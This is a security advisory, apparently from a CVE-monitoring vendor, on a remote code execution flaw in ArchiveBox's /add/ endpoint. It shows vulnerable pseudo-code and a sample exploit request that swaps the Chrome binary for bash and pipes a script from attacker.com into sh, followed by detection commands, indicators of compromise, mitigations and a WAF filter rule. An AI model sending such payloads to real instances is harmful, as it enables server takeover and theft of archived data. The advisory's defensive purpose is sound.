ArchiveBox is an ultra-popular open-source web archiving tool widely used by indie hackers, archivists, and research teams — it saves web pages locally along with their assets, screenshots, PDFs, WARC, etc. CVE-2026-42601 (CVSS 9.8) reveals a critical vulnerability in its /add/ endpoint: a JSON config field sent by the user is merged into the crawl configuration without validation, then exported as environment variables to archive plugins. Result: arbitrary argument injection and remote code execution.
The painful detail: no official patch is available to date. All versions ≤ 0.8.6rc0 are vulnerable, and the only viable mitigation is to isolate or pull the service until a fix lands.
Technical Details
Vulnerable component
ArchiveBox exposes a web UI to add new URLs for archiving. The /add/ endpoint (the AddView in core/views.py) accepts a JSON config field originally intended to let an admin customize crawl behavior per URL (timeout, user-agent, etc.).
The problem: this JSON is merged directly into the global config without sanitization. Then, when archive plugins run (wget, youtube-dl, chrome --headless, singlefile, etc.), the resulting config is exported as environment variables to the child process.
Exploitation path
# Reconstructed pseudo-code — vulnerable pattern
def AddView(request):
url = request.POST.get("url")
user_config = json.loads(request.POST.get("config", "{}"))
crawl_config = {**DEFAULT_CONFIG, **user_config} # ⚠️ unvalidated merge
for plugin in plugins:
env = {k.upper(): str(v) for k, v in crawl_config.items()} # ⚠️ every key becomes an env var
subprocess.run([plugin.command, url], env=env)
An attacker sends a POST:
{
"url": "https://example.com",
"config": {
"CHROME_BINARY": "/usr/bin/bash",
"CHROME_ARGS": "-c 'curl attacker.com/p.sh | sh'"
}
}
The Chrome plugin receives these env vars and, instead of launching the browser, runs bash with the payload.
Characteristics
| Field | Value |
|---|---|
| CVSS 3.1 | 9.8 (CRITICAL) |
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-78 (OS Command Injection) + CWE-454 (External Initialization of Trusted Variables) |
| Authentication | None by default on public deployments |
| Fix status | ❌ No official patch available |
Affected Products and Versions
| Product | Affected versions | Patched version |
|---|---|---|
| ArchiveBox | ≤ 0.8.6rc0 (all current versions) | ❌ None |
Check your version:
# Docker
docker exec archivebox archivebox version
# Pip
pip show archivebox | grep Version
Exploitation and Impact
Real exposure surface
Many ArchiveBox instances are publicly exposed without authentication:
- Personal hosting by amateur archivists
- University libraries running ArchiveBox as a private Wayback Machine
- Community platforms (web memory, citizen journalism)
A Shodan/Censys scan regularly shows thousands of reachable instances. All are immediately exploitable.
Post-exploitation impact
- RCE inside the ArchiveBox container/host: filesystem access, stored archives access
- Theft of archived data: for journalistic or research content, this can include sensitive sources, documented leaks
- LAN pivot: ArchiveBox often runs on a homelab or shared VPS
- Botnet recruitment / cryptomining: CPU is plentiful given the crawl workload
Public exploit
No detailed public PoC yet, but the exploit is trivial given the public description. Expect 24-48h before automated scanners catch up.
Detection and IOCs
ArchiveBox logs
# Hunt /add/ calls with non-standard config JSON bodies
grep -E "POST /add" /var/log/archivebox/access.log | \
grep -E "config.*CHROME|config.*BINARY|config.*PATH"
System logs
# Processes started by ArchiveBox with unexpected binaries
ps -ef | grep -i "archivebox" | grep -vE "wget|chrome|python|node"
# Suspicious env vars injected into child processes
# (inspect via /proc)
for pid in $(pgrep -P $(pgrep archivebox)); do
cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "binary|command|args"
done
Indicators of compromise
- Unexpected outbound connections from the ArchiveBox container/host
- Binary files appearing in
/tmp,/var/tmp,/dev/shm - Crontab or systemd service modifications
- Abnormal network traffic to non-archived destinations
Mitigation — Without an Official Patch
Option 1 — Immediate network isolation
If your ArchiveBox is internet-exposed:
# Block all incoming HTTP requests outside the LAN
sudo ufw deny in 8000/tcp
sudo ufw allow from 192.168.1.0/24 to any port 8000
# Or via Docker
# Update docker-compose to bind on 127.0.0.1 only
ports:
- "127.0.0.1:8000:8000"
Then reload:
docker compose up -d
Option 2 — Force authentication
ArchiveBox supports basic auth. Verify it's enabled:
# ArchiveBox config
archivebox config --set PUBLIC_INDEX=False
archivebox config --set PUBLIC_ADD_VIEW=False
archivebox config --set REQUIRE_LOGIN=True
Then create an admin account if not done:
archivebox manage createsuperuser
⚠️ This is a partial mitigation: an attacker who guesses or phishes an admin account can still exploit.
Option 3 — Reverse proxy with WAF
If you must keep public exposure (not recommended), put Nginx + ModSecurity in front:
location /add/ {
# Block requests containing suspect patterns in the JSON body
if ($request_body ~ "(_BINARY|_COMMAND|_ARGS|PATH|/bin/|/usr/bin/)") {
return 403;
}
proxy_pass http://archivebox:8000;
}
Option 4 — Pull the service
For production instances holding sensitive data: shut down the service until the ArchiveBox team ships an official patch. It's painful but the only option that fully eliminates the risk.
docker compose stop archivebox
Proactive watch
Subscribe to the ArchiveBox GitHub repo to be notified the moment a patch lands:
https://github.com/ArchiveBox/ArchiveBox/releases
Why Continuous Monitoring of Self-Hosted Stacks Matters
Self-hosted tools (ArchiveBox, Vaultwarden, Bitwarden CE, Jellyfin, Nextcloud, Gitea…) are massively deployed in homelabs and SMBs, often without security visibility. A CVE like CVE-2026-42601 — no patch, no wide announcement, no CISA KEV — can go unnoticed for weeks while being trivially exploitable.
With cveo.tech, inventory your self-hosted services alongside your core systems and get automatic alerts the moment a critical CVE targets one of your exact versions — even when the upstream maintainer stays quiet, your watch is current.